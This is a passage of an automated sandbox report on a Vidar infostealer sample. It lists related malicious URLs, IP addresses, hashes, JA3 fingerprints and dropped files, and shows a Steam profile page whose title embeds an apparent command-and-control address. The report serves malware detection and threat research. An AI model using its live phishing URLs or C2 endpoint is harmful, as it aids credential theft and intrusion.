                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse

                                                                                                                                                                          Domains

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          bg.microsoft.map.fastly.nethttps://administracionglobal.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                          https://aeno.co.jp.reqwcmjr.cn/aeonGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                          https://aeno.co.jp.wxoqpatm.cn/aeonGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.214.172
                                                                                                                                                                          https://govindaaamma.z28.web.core.windows.net/Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.214.172
                                                                                                                                                                          https://cloude-15e5.karsonjacobsen.workers.dev/d2d7e935-4585-4825-8391-46e4c9be230dGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                          https://windowsprogramdangererrorfoundcritical.kesug.com/?i=3Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                          https://aeno.co.jp.tckukspz.cn/aeonGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.214.172
                                                                                                                                                                          http://cpmcontsruction.com/DtRZMUGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                          http://ppmm.careGet hashmaliciousHtmlDropper, HTMLPhisherBrowse
                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                          May-Document-6_2024-5062.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.232.210.172
                                                                                                                                                                          steamcommunity.comGj8P0mbklo.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                          onxLpsxpVP.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                          https://www.steamvr.com/de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.71.182.190
                                                                                                                                                                          https://steamcommunitlu.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 104.96.244.29
                                                                                                                                                                          BS4GDarWw6.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 23.66.133.162
                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 184.87.56.26
                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 184.87.56.26
                                                                                                                                                                          tZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 104.105.90.131

                                                                                                                                                                          ASNs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          AKAMAI-ASUS23cu4ulxOg.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 172.225.201.2
                                                                                                                                                                          condition-agreement_2024_05_06_26.lnk.bin.lnkGet hashmaliciousBumbleBeeBrowse
                                                                                                                                                                          • 104.71.240.137
                                                                                                                                                                          https://docfilsxviews.webflow.io/Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 23.61.53.95
                                                                                                                                                                          Gj8P0mbklo.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                          onxLpsxpVP.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                          • 23.61.62.148
                                                                                                                                                                          #U00d6deme makbuzu ektedir.docx.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 96.17.61.58
                                                                                                                                                                          powershell.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 23.193.120.112
                                                                                                                                                                          pDWZMd3100.elfGet hashmaliciousMirai, GafgytBrowse
                                                                                                                                                                          • 23.40.23.231
                                                                                                                                                                          bot.arm6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                          • 96.16.159.21
                                                                                                                                                                          https://www.steamvr.com/de/Get hashmaliciousUnknownBrowse
                                                                                                                                                                          • 23.50.124.114
                                                                                                                                                                          ALABANZA-BALTUSBS4GDarWw6.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 65.108.93.119
                                                                                                                                                                          e5oMWYWLig.exeGet hashmaliciousRedLineBrowse
                                                                                                                                                                          • 65.108.19.51
                                                                                                                                                                          WFdAK6HQgz.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 65.109.195.235
                                                                                                                                                                          FATURA PROFORMA.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                                          • 65.108.69.93
                                                                                                                                                                          SecuriteInfo.com.Trojan.InstallCore.4086.15026.2213.exeGet hashmaliciousPrivateLoader, PureLog StealerBrowse
                                                                                                                                                                          • 65.108.134.122
                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 65.109.242.73
                                                                                                                                                                          SecuriteInfo.com.Trojan.PWS.RedLineNET.9.27772.28937.exeGet hashmaliciousPhonk Miner, PureLog Stealer, VidarBrowse
                                                                                                                                                                          • 65.109.242.73
                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 65.109.242.73
                                                                                                                                                                          file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                          • 65.109.242.73
                                                                                                                                                                          QBv5s2bHnV.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 64.176.126.17

                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          37f463bf4616ecd445d4a1937da06e19Transferencia-Caixa Bank.exeGet hashmaliciousDiscord Token Stealer, GuLoaderBrowse
                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                          HXUYIDwIMY.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                          Gj8P0mbklo.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                          onxLpsxpVP.exeGet hashmaliciousArc StealerBrowse
                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                          SecuriteInfo.com.NSIS.MalwareX-gen.17953.29383.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                          EXP263 Grupa Decora ARKU8341370 1x40.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                          List of our requirements 06520204Fly Wing.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                          EXP263 Decora Group ARKU8341370 1x40.exeGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                          73zGJqwgDy.exeGet hashmaliciousMofongoLoaderBrowse
                                                                                                                                                                          • 104.105.90.131
                                                                                                                                                                          J5kltefeTK.exeGet hashmaliciousMofongoLoaderBrowse
                                                                                                                                                                          • 104.105.90.131

                                                                                                                                                                          Dropped Files

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dllfile.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                              file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                tZvjMg3Hw9.exeGet hashmaliciousPureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRATBrowse
                                                                                                                                                                                  file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                    WlCIinu0yp.exeGet hashmaliciousLummaC Stealer, PureLog Stealer, RedLine, RisePro Stealer, Socks5Systemz, Vidar, zgRATBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousLummaC, GCleaner, Glupteba, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLineBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                          0dN59ZIkEM.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousVidarBrowse

                                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                                              C:\ProgramData\AEGIJKEHCAKF\BKKFHI

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):126976
                                                                                                                                                                                              Entropy (8bit):0.47147045728725767
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
                                                                                                                                                                                              MD5:A2D1F4CF66465F9F0CAC61C4A95C7EDE
                                                                                                                                                                                              SHA1:BA6A845E247B221AAEC96C4213E1FD3744B10A27
                                                                                                                                                                                              SHA-256:B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
                                                                                                                                                                                              SHA-512:C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\ProgramData\AEGIJKEHCAKF\GDBAKK

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                              Category:modified
                                                                                                                                                                                              Size (bytes):114688
                                                                                                                                                                                              Entropy (8bit):0.9746603542602881
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                                                                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                                                                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                                                                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                                                                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\ProgramData\AEGIJKEHCAKF\GHJJDG

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):49152
                                                                                                                                                                                              Entropy (8bit):0.8180424350137764
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                                                                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                                                                                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                                                                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                                                                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\ProgramData\AEGIJKEHCAKF\GHJKEH

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):28672
                                                                                                                                                                                              Entropy (8bit):2.5793180405395284
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                                                                                                                              MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                                                                                                                              SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                                                                                                                              SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                                                                                                                              SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\ProgramData\AEGIJKEHCAKF\HDBKJE

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):159744
                                                                                                                                                                                              Entropy (8bit):0.7873599747470391
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
                                                                                                                                                                                              MD5:6A6BAD38068B0F6F2CADC6464C4FE8F0
                                                                                                                                                                                              SHA1:4E3B235898D8E900548613DDB6EA59CDA5EB4E68
                                                                                                                                                                                              SHA-256:0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
                                                                                                                                                                                              SHA-512:BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Reputation:high, very likely benign file
                                                                                                                                                                                              Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\ProgramData\AEGIJKEHCAKF\IEHJJE

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):106496
                                                                                                                                                                                              Entropy (8bit):1.1358696453229276
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                                                                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                                                                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                                                                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                                                                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\ProgramData\AEGIJKEHCAKF\KFIJEG

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):40960
                                                                                                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):69993
                                                                                                                                                                                              Entropy (8bit):7.99584879649948
                                                                                                                                                                                              Encrypted:true
                                                                                                                                                                                              SSDEEP:1536:iMveRG6BWC7T2g1wGUa5QUoaIB9ttiFJG+AOQOXl0Usvwr:feRG6BX6gUaHo9tkBHiUewr
                                                                                                                                                                                              MD5:29F65BA8E88C063813CC50A4EA544E93
                                                                                                                                                                                              SHA1:05A7040D5C127E68C25D81CC51271FFB8BEF3568
                                                                                                                                                                                              SHA-256:1ED81FA8DFB6999A9FEDC6E779138FFD99568992E22D300ACD181A6D2C8DE184
                                                                                                                                                                                              SHA-512:E29B2E92C496245BED3372578074407E8EF8882906CE10C35B3C8DEEBFEFE01B5FD7F3030ACAA693E175F4B7ACA6CD7D8D10AE1C731B09C5FA19035E005DE3AA
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:MSCF....i.......,...................I.................oXAy .authroot.stl.Ez..Q6..CK..<Tk...p.k..1...3...[..%Y.f..."K.6)..[*I.hOB."..rK.RQ*..}f..f...}....9.|.....gA...30.,O2L...0..%.U...U.t.....`dqM2.x..t...<(uad.c...x5V.x..t..agd.v......i...KD..q(. ...JJ......#..'=. ...3.x...}...+T.K..!.'.`w .!.x.r.......YafhG..O.3....'P[..'.D../....n..t....R<..=\E7L0?{..T.f...ID...,...r....3z..O/.b.Iwx.. .o...a\.s........."..'.......<;s.[...l...6.)ll..B.P.....k.... k0.".t!/.,........{...P8....B..0(.. .Q.....d...q,\.$.n.Q.\.p...R..:.hr./..8.S<a.s...+#3....D..h1.a.0....{.9.....:e.......n.~G.{.M.1..OU.....B.Q..y_>.P{...}i.=.a..QQT.U..|!.pyCD@.....l..70..w..)...W^.`l...%Y.\................i..=hYV.O8W@P.=.r.=..1m..1....)\.p..|.c.3..t..[...).....l.{.Y....\S.....y....[.mCt....Js;...H....Q..F.....g.O...[..A.=...F[..z....k...mo.lW{`....O...T.g.Y.Uh.;m.'.N..f..}4..9i..t4p_bI..`.....Ie..l.P.... ...Lg......[....5g...~D.s.h'>n.m.c.7...-..P.gG...i$...v.m.b[.yO.P/*.YH.

                                                                                                                                                                                              C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:data
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):330
                                                                                                                                                                                              Entropy (8bit):3.217935332070547
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:6:kKklEN+SkQlPlEGYRMY9z+4KlDA3RUeVlWI/Vt:MlbkPlE99SNxAhUeVLVt
                                                                                                                                                                                              MD5:457C16EABAD85393C2438B34FEB507A6
                                                                                                                                                                                              SHA1:0CE6ADD73AD8EE9C5AE93913F90C10F60B2E2F84
                                                                                                                                                                                              SHA-256:DA40515D3E2FB4633893866C996982458B76FFDA1977689597DAED2146E26A71
                                                                                                                                                                                              SHA-512:D9FA070DE00C0BDDE916FD8A902302CFC9BC09FFCC0BFAAC8CD967EA39A790DB8D85905176ECBC09E2F1DF19749D8FD9D113AE2D7F46DC3350B96FB1B3291389
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:p...... ........ .9.....(....................................................... ........M.........(.....wl....i...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".b.3.6.8.5.3.8.5.a.4.7.f.d.a.1.:.0."...

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                              Entropy (8bit):4.0050635535766075
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:3:QHXMKa/xwwUy:Q3La/xwQ
                                                                                                                                                                                              MD5:84CFDB4B995B1DBF543B26B86C863ADC
                                                                                                                                                                                              SHA1:D2F47764908BF30036CF8248B9FF5541E2711FA2
                                                                                                                                                                                              SHA-256:D8988D672D6915B46946B28C06AD8066C50041F6152A91D37FFA5CF129CC146B
                                                                                                                                                                                              SHA-512:485F0ED45E13F00A93762CBF15B4B8F996553BAA021152FAE5ABA051E3736BCD3CA8F4328F0E6D9E3E1F910C96C4A9AE055331123EE08E3C2CE3A99AC2E177CE
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\76561199680449169[1].htm

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):35663
                                                                                                                                                                                              Entropy (8bit):5.3820204547725865
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:768:c7pqLtWYmwt5D0gq9siNGAGPzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2Sq:c78LtWYmwt5D0gq9scGPzzgiJmDzJtx2
                                                                                                                                                                                              MD5:ED01FF8187C1C331702AB5F6E5E1631B
                                                                                                                                                                                              SHA1:B982DE4E0762387C0FFFCFAC84B86FAE16EA52C1
                                                                                                                                                                                              SHA-256:CB3DC06E3EBE65FC84FB78704A23A69B5961B6F62D72CAD01B2AECD4774763BE
                                                                                                                                                                                              SHA-512:3CCFEF284D9A104BCC00BDE50CAC1DE5578281BFF2F8DA1872AC722E128C5814CD4B77438BB80577E825BE077A8426FB2629995D905C5D03847E56D0ECC01C59
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: p__o https://65.108.152.56:9000|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=2VoZa2M8Wh3k&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/global

                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqlx[1].dll

                                                                                                                                                                                              Download File
                                                                                                                                                                                              Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                              Size (bytes):2459136
                                                                                                                                                                                              Entropy (8bit):6.052474106868353
                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                              SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                                                                                                                                              MD5:90E744829865D57082A7F452EDC90DE5
                                                                                                                                                                                              SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                                                                                                                                              SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                                                                                                                                              SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: tZvjMg3Hw9.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: WlCIinu0yp.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: 0dN59ZIkEM.exe, Detection: malicious, Browse
                                                                                                                                                                                              • Filename: file.exe, Detection: malicious, Browse
